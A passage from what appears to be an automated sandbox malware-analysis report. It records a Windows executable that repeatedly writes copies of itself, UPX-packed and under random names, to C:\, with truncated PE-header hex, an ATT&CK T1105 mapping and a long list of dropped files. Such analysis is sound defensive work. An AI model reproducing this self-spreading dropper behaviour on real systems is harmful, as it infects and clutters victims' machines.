4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"064260.exe\" wrote 14377 bytes starting with PE header signature to file \"C:\\628008.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"628008.exe\" wrote 14389 bytes starting with PE header signature to file \"C:\\nxhlxrp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxhlxrp.exe\" wrote 14403 bytes starting with PE header signature to file \"C:\\jbdtnd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jbdtnd.exe\" wrote 14417 bytes starting with PE header signature to file \"C:\\rbffv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbffv.exe\" wrote 14431 bytes starting with PE header signature to file \"C:\\464446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"464446.exe\" wrote 14445 bytes starting with PE header signature to file \"C:\\04284.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04284.exe\" wrote 14455 bytes starting with PE header signature to file \"C:\\jfdjvd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jfdjvd.exe\" wrote 14469 bytes starting with PE header signature to file \"C:\\nrhhv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nrhhv.exe\" wrote 14486 bytes starting with PE header signature to file \"C:\\tbbdbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tbbdbn.exe\" wrote 14501 bytes starting with PE header signature to file \"C:\\xpldnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xpldnr.exe\" wrote 14519 bytes starting with PE header signature to file \"C:\\hrbbfnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hrbbfnh.exe\" wrote 14535 bytes starting with PE header signature to file \"C:\\llrlrrb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"llrlrrb.exe\" wrote 14546 bytes starting with PE header signature to file \"C:\\vjdhtlv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vjdhtlv.exe\" wrote 14557 bytes starting with PE header signature to file \"C:\\ffpfpp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ffpfpp.exe\" wrote 14575 bytes starting with PE header signature to file \"C:\\thdpjd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thdpjd.exe\" wrote 14585 bytes starting with PE header signature to file \"C:\\00688.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00688.exe\" wrote 14601 bytes starting with PE header signature to file \"C:\\8644820.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8644820.exe\" wrote 14612 bytes starting with PE header signature to file \"C:\\2022484.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2022484.exe\" wrote 14627 bytes starting with PE header signature to file \"C:\\rvbjvln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rvbjvln.exe\" wrote 14641 bytes starting with PE header signature to file \"C:\\ldnfnvr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldnfnvr.exe\" wrote 14655 bytes starting with PE header signature to file \"C:\\httbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"httbh.exe\" wrote 14675 bytes starting with PE header signature to file \"C:\\jnnjf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jnnjf.exe\" wrote 14689 bytes starting with PE header signature to file \"C:\\bnxtdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnxtdj.exe\" wrote 14707 bytes starting with PE header signature to file \"C:\\rbppd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbppd.exe\" wrote 14717 bytes starting with PE header signature to file \"C:\\nnpbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nnpbn.exe\" wrote 14736 bytes starting with PE header signature to file \"C:\\6824004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6824004.exe\" wrote 14748 bytes starting with PE header signature to file \"C:\\08466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08466.exe\" wrote 14768 bytes starting with PE header signature to file \"C:\\8822846.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8822846.exe\" wrote 14782 bytes starting with PE header signature to file \"C:\\dnhpbvd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dnhpbvd.exe\" wrote 14794 bytes starting with PE header signature to file \"C:\\fxlrjhd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxlrjhd.exe\" wrote 14814 bytes starting with PE header signature to file \"C:\\fxxdb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxxdb.exe\" wrote 14825 bytes starting with PE header signature to file \"C:\\lbdtbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbdtbf.exe\" wrote 14838 bytes starting with PE header signature to file \"C:\\482088.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482088.exe\" wrote 14857 bytes starting with PE header signature to file \"C:\\0604428.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0604428.exe\" wrote 14870 bytes starting with PE header signature to file \"C:\\jlvlb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jlvlb.exe\" wrote 14886 bytes starting with PE header signature to file \"C:\\lpnpn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lpnpn.exe\" wrote 14896 bytes starting with PE header signature to file \"C:\\dnjtl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dnjtl.exe\" wrote 14906 bytes starting with PE header signature to file \"C:\\lvdfpxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvdfpxj.exe\" wrote 14917 bytes starting with PE header signature to file \"C:\\jnbhhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jnbhhn.exe\" wrote 14933 bytes starting with PE header signature to file \"C:\\hbbtpvh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hbbtpvh.exe\" wrote 14950 bytes starting with PE header signature to file \"C:\\hnndln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hnndln.exe\" wrote 14970 bytes starting with PE header signature to file \"C:\\blpvx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"blpvx.exe\" wrote 14987 bytes starting with PE header signature to file \"C:\\8064284.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8064284.exe\" wrote 14997 bytes starting with PE header signature to file \"C:\\68606.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"68606.exe\" wrote 15014 bytes starting with PE header signature to file \"C:\\02684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02684.exe\" wrote 15025 bytes starting with PE header signature to file \"C:\\0888688.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0888688.exe\" wrote 15038 bytes starting with PE header signature to file \"C:\\8080842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8080842.exe\" wrote 15051 bytes starting with PE header signature to file \"C:\\0002220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0002220.exe\" wrote 15071 bytes starting with PE header signature to file \"C:\\604424.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"604424.exe\" wrote 15091 bytes starting with PE header signature to file \"C:\\pdhnj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdhnj.exe\" wrote 15108 bytes starting with PE header signature to file \"C:\\rhnxdp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhnxdp.exe\" wrote 15128 bytes starting with PE header signature to file \"C:\\nxfnfn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxfnfn.exe\" wrote 15143 bytes starting with PE header signature to file \"C:\\tdtflp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tdtflp.exe\" wrote 15158 bytes starting with PE header signature to file \"C:\\rhxhth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhxhth.exe\" wrote 15174 bytes starting with PE header signature to file \"C:\\00008.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00008.exe\" wrote 15187 bytes starting with PE header signature to file \"C:\\66446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66446.exe\" wrote 15204 bytes starting with PE header signature to file \"C:\\4824668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4824668.exe\" wrote 15214 bytes starting with PE header signature to file \"C:\\njhpfx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"njhpfx.exe\" wrote 15230 bytes starting with PE header signature to file \"C:\\bjdlj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bjdlj.exe\" wrote 15241 bytes starting with PE header signature to file \"C:\\jnnxfl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jnnxfl.exe\" wrote 15257 bytes starting with PE header signature to file \"C:\\xrfjx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xrfjx.exe\" wrote 15271 bytes starting with PE header signature to file \"C:\\ftbltx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"vhxrtdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bdnnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pfdblvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bphhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jvrbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"njvhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"468866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"664842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"840664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"886680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"404286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"62664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ftbltx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftbltx.exe]- [targetUID: 00000000-00004468]\n \"xrfjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfjx.exe]- [targetUID: 00000000-00004468]\n \"jnnxfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnnxfl.exe]- [targetUID: 00000000-00003832]\n \"bjdlj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjdlj.exe]- [targetUID: 00000000-00003832]\n \"njhpfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njhpfx.exe]- [targetUID: 00000000-00001112]\n \"4824668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4824668.exe]- [targetUID: 00000000-00003556]\n \"66446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66446.exe]- [targetUID: 00000000-00003416]\n \"00008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00008.exe]- [targetUID: 00000000-00003416]\n \"rhxhth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhxhth.exe]- [targetUID: 00000000-00003856]\n \"tdtflp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdtflp.exe]- [targetUID: 00000000-00003856]\n \"nxfnfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxfnfn.exe]- [targetUID: 00000000-00000644]\n \"rhnxdp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnxdp.exe]- [targetUID: 00000000-00003636]\n \"pdhnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhnj.exe]- [targetUID: 00000000-00003636]\n \"604424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\604424.exe]- [targetUID: 00000000-00001544]\n \"0002220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002220.exe]- [targetUID: 00000000-00001468]\n \"8080842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8080842.exe]- [targetUID: 00000000-00001468]\n \"0888688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0888688.exe]- [targetUID: 00000000-00003200]\n \"02684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02684.exe]- [targetUID: 00000000-00004400]\n \"68606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68606.exe]- [targetUID: 00000000-00001744]\n \"8064284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8064284.exe]- [targetUID: 00000000-00001744]\n \"blpvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blpvx.exe]- [targetUID: 00000000-00003492]\n \"hnndln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnndln.exe]- [targetUID: 00000000-00001708]\n \"hbbtpvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbbtpvh.exe]- [targetUID: 00000000-00001740]\n \"jnbhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnbhhn.exe]- [targetUID: 00000000-00004432]\n \"lvdfpxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvdfpxj.exe]- [targetUID: 00000000-00004432]\n \"dnjtl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnjtl.exe]- [targetUID: 00000000-00002888]\n \"lpnpn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpnpn.exe]- [targetUID: 00000000-00002888]\n \"jlvlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jlvlb.exe]- [targetUID: 00000000-00003568]\n \"0604428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0604428.exe]- [targetUID: 00000000-00003568]\n \"482088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482088.exe]- [targetUID: 00000000-00001184]\n \"lbdtbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbdtbf.exe]- [targetUID: 00000000-00002768]\n \"fxxdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxxdb.exe]- [targetUID: 00000000-00002768]\n \"fxlrjhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxlrjhd.exe]- [targetUID: 00000000-00002076]\n \"dnhpbvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnhpbvd.exe]- [targetUID: 00000000-00003040]\n \"8822846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8822846.exe]- [targetUID: 00000000-00003040]\n \"08466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08466.exe]- [targetUID: 00000000-00001908]\n \"6824004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6824004.exe]- [targetUID: 00000000-00004076]\n \"nnpbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnpbn.exe]- [targetUID: 00000000-00004076]\n \"rbppd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbppd.exe]- [targetUID: 00000000-00004324]\n \"bnxtdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnxtdj.exe]- [targetUID: 00000000-00001896]\n \"jnnjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnnjf.exe]- [targetUID: 00000000-00001896]\n \"httbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\httbh.exe]- [targetUID: 00000000-00001888]\n \"ldnfnvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldnfnvr.exe]- [targetUID: 00000000-00004368]\n \"rvbjvln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rvbjvln.exe]- [targetUID: 00000000-00004368]\n \"2022484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2022484.exe]- [targetUID: 00000000-00000772]\n \"8644820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8644820.exe]- [targetUID: 00000000-00003708]\n \"00688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00688.exe]- [targetUID: 00000000-00004172]\n \"thdpjd.exe\" has type \"PE32 executable (GUI) Intel 